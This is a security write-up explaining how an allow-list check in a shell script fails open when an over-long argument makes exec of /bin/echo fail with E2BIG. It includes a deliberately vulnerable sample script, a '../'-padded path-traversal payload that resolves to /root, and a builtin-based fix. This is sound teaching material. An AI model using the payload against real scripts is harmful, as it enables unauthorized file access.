a sample of [cdwdoc-2023-001], malicious data from a text file
This sample is for modern Linux (kernel 2.6.23 or later, with /usr/bin/realpath from GNU coreutils or a symlink to a modern busybox built against glibc).
#!/bin/sh
# written by cleemy desu wayo / see [cdwdoc-2023-001] / Licensed under CC0 1.0
# take the sixth column of the first passwd.txt line whose user name is $1
user_home_dir=$(grep "^$1"':' < passwd.txt | head -1 | awk -F: '{print $6}')
[ "dummy$user_home_dir" = "dummy" ] && exit 1
# too optimistic
# note: /bin/echo is an external program, so this check only runs if it can be exec'd
if /bin/echo "dummy$user_home_dir" | grep '[^a-z0-9/]' > /dev/null ; then
echo "error: invalid dir" >&2
exit 1
fi
realpath "$user_home_dir"
exit 0
This script extracts a string from passwd.txt in the current directory and finally passes it to realpath. Before it is passed to realpath, the string is checked against an allow-list of characters ([a-z0-9/]). In the example shown below, it is assumed that /home/user1 exists. passwd.txt is a bit like /etc/passwd: the first column is the user name and the sixth column is the home directory.

$ echo 'user1:::::/home/user1:/bin/sh' > passwd.txt
$ ./cdwdoc-2023-001_sample_dir3.sh user1
/home/user1

So what happens if the sixth column is something like "/home/user1/../../root"?

$ echo 'user2:::::/home/user1/../../root:/bin/sh' >> passwd.txt
$ ./cdwdoc-2023-001_sample_dir3.sh user2
error: invalid dir

It is properly rejected: "." is not in the allow-list. So what happens when we do this?

$ printf 'user3:::::/home/user1/' >> passwd.txt
$ yes '../' | head -43685 | tr -d '\n' >> passwd.txt
$ printf 'root:/bin/sh\n' >> passwd.txt
$ ./cdwdoc-2023-001_sample_dir3.sh user3
./cdwdoc-2023-001_sample_dir3.sh: 9: /bin/echo: Argument list too long
/root

We got "/root". The check did run, but /bin/echo is an external program, and "dummy" plus the sixth column is now longer than the kernel's per-argument limit, so the shell's execve() of /bin/echo failed with E2BIG ("Argument list too long"). grep read empty input and exited 1, the `if` was not taken, and the unchecked string went straight to realpath, which collapsed all the "../" components into /root. The count of 43685 is not arbitrary: on an x86_64 kernel the per-argument limit (MAX_ARG_STRLEN) is 131072 bytes including the terminating NUL, and the sixth column is 131071 bytes, so realpath can still be exec'd with it while the same string prefixed with "dummy" cannot. Anything that exits the shell to do its validation (echo, grep, sed, a separate helper script) has this failure mode; the error status of the failed exec is also lost here because the pipeline's status is grep's, not echo's.
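The two checks side by side, as an added example that is not part of cdwdoc-2023-001 or its sample scripts: the sample's external /bin/echo | grep pipeline, and the same allow-list enforced with the shell's builtin `case`, which never goes through execve() and therefore has no argument-length limit to hit. The function names, the payload builder and the verdict helper are this example's own; the payload is the constructed "/home/user1/" + 43685 x "../" + "root" string from the text.

```sh
#!/bin/sh
# Added example, not part of cdwdoc-2023-001 or its sample scripts.
# Compares the sample's check (external /bin/echo piped into grep) with a
# check done entirely with shell builtins, using the same oversized "../"
# payload, so the difference can be observed on a real kernel.

# The sample's check as a function: returns 0 when the string is flagged
# invalid, 1 when it is accepted. /bin/echo is exec'd, so an argument longer
# than the kernel's per-argument limit (MAX_ARG_STRLEN, 131072 bytes on
# x86_64 Linux >= 2.6.23) never reaches grep: execve() fails with E2BIG,
# grep sees empty input and exits 1, and the string is accepted.
check_with_external_echo() {
  /bin/echo "dummy$1" | grep '[^a-z0-9/]' > /dev/null
}

# Same allow-list enforced with `case`, a builtin: no exec, no ARG_MAX,
# every byte is examined whatever the length. Same return convention.
check_with_builtin() {
  case "$1" in
    '')            return 0 ;;   # empty is not a directory
    *[!a-z0-9/]*)  return 0 ;;   # any byte outside the allow-list
    *)             return 1 ;;
  esac
}

# Build "/home/user1/" + N copies of "../" + "root" (constructed test data,
# the sixth-column payload from the text with the count as a parameter).
make_payload() {
  n=$1
  dots=$(yes '../' | head -n "$n" | tr -d '\n')
  printf '%s' "/home/user1/${dots}root"
}

# Human-readable verdict for one string under one checker.
verdict() {
  if "$1" "$2"; then echo "invalid"; else echo "accepted"; fi
}

short='/home/user1/../../root'
long=$(make_payload 43685)

echo "short payload (${#short} bytes):"
echo "  external echo: $(verdict check_with_external_echo "$short")"
echo "  builtin case : $(verdict check_with_builtin "$short")"
echo "long payload (${#long} bytes):"
echo "  external echo: $(verdict check_with_external_echo "$long")"
echo "  builtin case : $(verdict check_with_builtin "$long")"
```

On a stock x86_64 Linux kernel the long payload prints "Argument list too long" from /bin/echo and is reported as "accepted" by the external check, while the builtin check reports it "invalid"; on a kernel with a larger per-argument limit both checks reject it, which is exactly the point: the builtin version does not depend on the platform limit at all.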
When trying cdwdoc-2023-001_sample_dir.sh as a stand-alone script from a terminal, the user trying it is themselves affected by the ARG_MAX limit: the overlong path has to be passed on a command line, so the shell cannot exec the script with it. In the case of cdwdoc-2023-001_sample_dir3.sh, the attacker may not be affected by the ARG_MAX limit at all: the payload arrives through a file, and the only thing that has to fit on a command line is the short user name.

cdwdoc-2023-001_sample_dir.sh is here: https://gitlab.com/-/snippets/2487375